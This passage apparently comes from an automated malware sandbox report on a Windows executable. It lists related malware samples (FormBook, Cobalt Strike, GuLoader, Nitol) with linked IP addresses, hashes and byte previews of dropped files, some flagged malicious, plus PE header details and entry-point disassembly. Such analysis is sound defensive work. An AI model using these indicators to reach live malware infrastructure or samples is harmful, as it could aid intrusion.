              • 139.240.73.120
              4.elfGet hashmaliciousUnknownBrowse
              • 42.120.233.253
              AuKUol8SPU.exeGet hashmaliciousFormBookBrowse
              • 8.136.96.106
              frosty.x86.elfGet hashmaliciousMiraiBrowse
              • 47.110.90.76
              3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
              • 8.136.96.106
              beacon_x86.exeGet hashmaliciousCobaltStrikeBrowse
              • 8.148.6.140
              beacon_x86.exeGet hashmaliciousCobaltStrikeBrowse
              • 8.148.6.140
              beacon_x64.exeGet hashmaliciousCobaltStrikeBrowse
              • 8.148.6.140
              2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
              • 118.178.60.103
              armv5l.elfGet hashmaliciousUnknownBrowse
              • 47.116.93.193
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              37f463bf4616ecd445d4a1937da06e19yMXFgPOdf2.exeGet hashmaliciousGuLoaderBrowse
              • 39.103.20.105
              02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 39.103.20.105
              LMSxhK1u8Z.exeGet hashmaliciousGuLoaderBrowse
              • 39.103.20.105
              ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
              • 39.103.20.105
              ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
              • 39.103.20.105
              4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
              • 39.103.20.105
              ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
              • 39.103.20.105
              YrCSUX2O3I.exeGet hashmaliciousGuLoaderBrowse
              • 39.103.20.105
              4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
              • 39.103.20.105
              4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
              • 39.103.20.105
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\Documents\CrwRQN.exe2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                  2362476847-83854387.07.exeGet hashmaliciousUnknownBrowse
                    2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                      2o63254452-763487230.06.exeGet hashmaliciousUnknownBrowse
                        e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                          e2664726330-76546233.05.exeGet hashmaliciousUnknownBrowse
                            23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                              287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                287438657364-7643738421.08.exeGet hashmaliciousUnknownBrowse
                                  Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3892010
                                  Entropy (8bit):7.995495589600101
                                  Encrypted:true
                                  SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                  MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                  SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                  SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                  SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                  Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):5.186642107139491
                                  Encrypted:false
                                  SSDEEP:6:WcSRpdRdbCrCa2BIDR+syYWRudduXCCA7OdUzW9E40/qcX:URpiMBIDRNyYWRudduXCCigUzWg3
                                  MD5:A1CC6E3DD3069453BEF8913F9698C666
                                  SHA1:2A3E6F584700A78F1C1691238F9673CBCA8084FD
                                  SHA-256:4BF6D36A529FD1214D07E344298AF465AA7D764CA2BDBBA4B3D7C070B3CE25F9
                                  SHA-512:76A43622E6FDF6DE22F3EAC452F378C809FC28B84CA76774818BD8ACD9C2AC352085BE0F721B661978B0B98A4B87AEBC8C4ED6815C48FC271992094EE75BE57D
                                  Malicious:false
                                  Reputation:low
                                  Preview:....l%00...X>?v7DD.T:y61X[X_8q>3ZJF]>.s>QS._q86999999999999999999999999999999999QMMI:sffPPT.hi a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33...[=<u4GG.W9z52[X[\;r=0YIE^=-p=RP.^p97888888888888888888888888888888888PLLH;rggQQU.ih!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                                  Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):125333
                                  Entropy (8bit):7.993522712936246
                                  Encrypted:true
                                  SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                  MD5:2CA9F4AB0970AA58989D66D9458F8701
                                  SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                  SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                  SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                  Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                  Category:dropped
                                  Size (bytes):8299
                                  Entropy (8bit):7.9354275320361545
                                  Encrypted:false
                                  SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                  MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                  SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                  SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                  SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                  Malicious:false
                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............
                                  Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):10681
                                  Entropy (8bit):7.866148090449211
                                  Encrypted:false
                                  SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                  MD5:10A818386411EE834D99AE6B7B68BE71
                                  SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                  SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                  SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                  Malicious:false
                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                  Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):135589
                                  Entropy (8bit):7.995304392539578
                                  Encrypted:true
                                  SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                  MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                  SHA1:561836F6228E24180238DF9456707A2443C5795C
                                  SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                  SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                  Malicious:false
                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                  Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):28272
                                  Entropy (8bit):7.711609374937868
                                  Encrypted:false
                                  SSDEEP:384:90egCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQ4:n5F1FUdy422IK+gAZt2i0YPpQn4GM7
                                  MD5:6CCEDC77FFDF669D35422F4A06473AC7
                                  SHA1:14E290D17BB36F92521EB03393882242543C086D
                                  SHA-256:6FC87BF9BAA7FF4F5F538239CD40590FD0DA09648E3D627A91EE641B92D2C868
                                  SHA-512:98D19E77C07EDFBC986B70D9346FBD3799F0E2A6950332534B6380CDE2BB465E946B8AFE4775342081CDD1300C4D9DFB3E32003F0685385CF8C2D72C9590B988
                                  Malicious:false
                                  Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                  Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):133136
                                  Entropy (8bit):6.350273548571922
                                  Encrypted:false
                                  SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                  MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                  SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                  SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                  SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: 2873466535874-68348745.02.exe, Detection: malicious, Browse
                                  • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                  • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                  • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                  • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                  • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                  • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                  • Filename: 23567791246-764698008.02.exe, Detection: malicious, Browse
                                  • Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
                                  • Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):3889557
                                  Entropy (8bit):7.999938763100077
                                  Encrypted:true
                                  SSDEEP:98304:cAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:3ndLOZS/DtpPJRO8OHBL4f2UQI+A
                                  MD5:5269C8FDE566096C1C01B4916A3FBBA3
                                  SHA1:AF1EEDF79379FF8EDC8F1C5607D985A04D2E1075
                                  SHA-256:63EF2768287A48A1D5D4F2AFBA8281E7CDBBA752E034060F929429FD69D2BA54
                                  SHA-512:6FB5209DD49550767BBDA28481859670E3113B70E5764A073271A09E6380B5F7DA7146F6BB187A55C53C036B3F740DEE8910222DAF13A137F6BF3D216CB9ACE7
                                  Malicious:false
                                  Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                  Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                  File Type:GIF image data, version 89a, 10 x 10
                                  Category:dropped
                                  Size (bytes):8228
                                  Entropy (8bit):7.978923000469195
                                  Encrypted:false
                                  SSDEEP:192:pBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:pBuNhyTlBU2dp+1XrBuCgp9vU0l
                                  MD5:EABF8363BB896F6223D9A96981DDF155
                                  SHA1:3CEBA87BECD12FEBA6F4C0CF3E8F006832A6A441
                                  SHA-256:4689C31247FC55E6CF366958EE822A068A32921F2370DDCFD53F80B492F31A9B
                                  SHA-512:0E35BF083F29DD73D6BB4D5F6063426A2903F180F9224F81B0A20493347C87827ECB58E91DBD4BB554D1D9FA19BF995C749C6C5D99951A52C7441FABA1523BF9
                                  Malicious:false
                                  Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                                  Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):122880
                                  Entropy (8bit):6.002026305451016
                                  Encrypted:false
                                  SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52F1:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5g1
                                  MD5:AAEB1EF7C607033101D9678D0EB8C991
                                  SHA1:EA5AB0B857ECCF8F2A035B38CF1DEF9109C16833
                                  SHA-256:ADC6AED5C20AA040A9A755CB45FEF5C4EFE860454578EF0A510D133AA4A1ACBB
                                  SHA-512:F8AA395CFB128525D192085EF95F00802CFADBD3D4ECFDFA716D24EC57D087DDCEC58ED35A1FC6852CF2D935DC367DF258A304C9C971E6DEC5B030DED2845F66
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\2976587-987347589.07.exe
                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):28272
                                  Entropy (8bit):6.229017898212063
                                  Encrypted:false
                                  SSDEEP:384:S3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/L:SOUkgfdZ9pRyv+uPzCMHo3q4tDgh9
                                  MD5:4662D65CA800E4E3EA984147DD93DF87
                                  SHA1:91D4B0BD821E7D8D654AB1584A59AFEB8347C8D4
                                  SHA-256:94D79A742FBA6A3B8936FE3A49D01EE1332D326EF5E66B6F6AB7D969AFE0BA36
                                  SHA-512:A2850BE5CF755570588A08DCEBDFF2EE4102DC3715862D7DF6E443D9A34093874544B1EBE652C7250A703E4E378E09B99384B93507B6CD74D6E21037D2507642
                                  Malicious:true
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                  Entropy (8bit):0.0837008799425276
                                  TrID:
                                  • Win64 Executable GUI (202006/5) 92.65%
                                  • Win64 Executable (generic) (12005/4) 5.51%
                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                  • DOS Executable Generic (2002/1) 0.92%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:2976587-987347589.07.exe
                                  File size:30'887'936 bytes
                                  MD5:67ab54b4fc69f4175d217dd57154a27c
                                  SHA1:f753d5cf1dde05bd2b3417ddfcd12306219fdef3
                                  SHA256:898349755ad447054ca99dc779c1f5b6c1dd4a7c0dcf1dda1d0e8bbaa6406b36
                                  SHA512:00b2c238ad1aecd63fb73c7dc6616e198302fd3ee665696e59fe99d189853e115648df3360fe51d0399af304b375811ca546b465504b63d28ce3a2a84a2baf0b
                                  SSDEEP:3072:U54rQk5rIYRl8YLiVeUeqH+WEwugQyXY2YHFkc1e5evFBDwRucQyTvRBsmuB:q4rUKDLiVeUhEFeYHt1e5evDw/K
                                  TLSH:BF67AD1B77E070F9E1B69678C8125649D772B8331731AB9F03A44286DF376D18D3AB22
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X.E.X.E.X.E.:.D.X.E.:.D.X.E.:.D"X.E...D.X.E...D.X.E...D.X.E...E.X.E.X.E.X.E5..D.X.E5..D.X.ERich.X.E........PE..d...%IWe...
                                  Icon Hash:338ed4d4a2726922
                                  Entrypoint:0x140004988
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x140000000
                                  Subsystem:windows gui
                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x65574925 [Fri Nov 17 11:06:13 2023 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:0
                                  File Version Major:6
                                  File Version Minor:0
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:0
                                  Import Hash:0f7cdde37f1462484539e0138cfa1fe2
                                  Instruction
                                  dec eax
                                  sub esp, 28h
                                  call 00007F7C64D40A48h
                                  dec eax
                                  add esp, 28h
                                  jmp 00007F7C64D3CCB0h
                                  int3
                                  int3
                                  jmp 00007F7C64D42EF0h
                                  int3
                                  int3
                                  int3
                                  inc eax
                                  push ebx
                                  dec eax
                                  sub esp, 20h
                                  dec eax
                                  mov ebx, ecx
                                  jmp 00007F7C64D405F3h
                                  dec eax
                                  mov ecx, ebx
                                  call 00007F7C64D42EF6h
                                  test eax, eax
                                  jne 00007F7C64D405E4h
                                  dec eax
                                  cmp ebx, FFFFFFFFh
                                  jne 00007F7C64D405D9h
                                  call 00007F7C64D40F57h
                                  jmp 00007F7C64D405D7h
                                  call 00007F7C64D40F30h
                                  dec eax
                                  mov ecx, ebx
                                  call 00007F7C64D42F3Ch
                                  dec eax
                                  test eax, eax
                                  je 00007F7C64D405A7h
                                  dec eax
                                  add esp, 20h
                                  pop ebx
                                  ret
                                  inc eax
                                  push ebx
                                  dec eax
                                  sub esp, 20h
                                  dec eax
                                  mov ebx, ecx
                                  xor ecx, ecx
                                  call dword ptr [0000A6CFh]
                                  dec eax
                                  mov ecx, ebx
                                  call dword ptr [0000A6BEh]
                                  call dword ptr [0000A6C8h]
                                  dec eax
                                  mov ecx, eax
                                  mov edx, C0000409h
                                  dec eax
                                  add esp, 20h
                                  pop ebx
                                  dec eax
                                  jmp dword ptr [0000A6BCh]
                                  dec eax
                                  mov dword ptr [esp+08h], ecx
                                  dec eax
                                  sub esp, 38h
                                  mov ecx, 00000017h
                                  call 00007F7C64D49B2Ch
                                  test eax, eax
                                  je 00007F7C64D405D9h
                                  mov ecx, 00000002h
                                  int 29h
                                  dec eax
                                  lea ecx, dword ptr [00014FF7h]
                                  call 00007F7C64D4067Fh
                                  dec eax
                                  mov eax, dword ptr [esp+38h]
                                  dec eax
                                  mov dword ptr [000150DEh], eax
                                  dec eax
                                  lea eax, dword ptr [esp+38h]
                                  Programming Language:
                                  • [C++] VS2015 UPD3.1 build 24215
                                  • [LNK] VS2015 UPD3.1 build 24215
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x177340x64.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d760000x4abc.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d740000xcc0.pdata
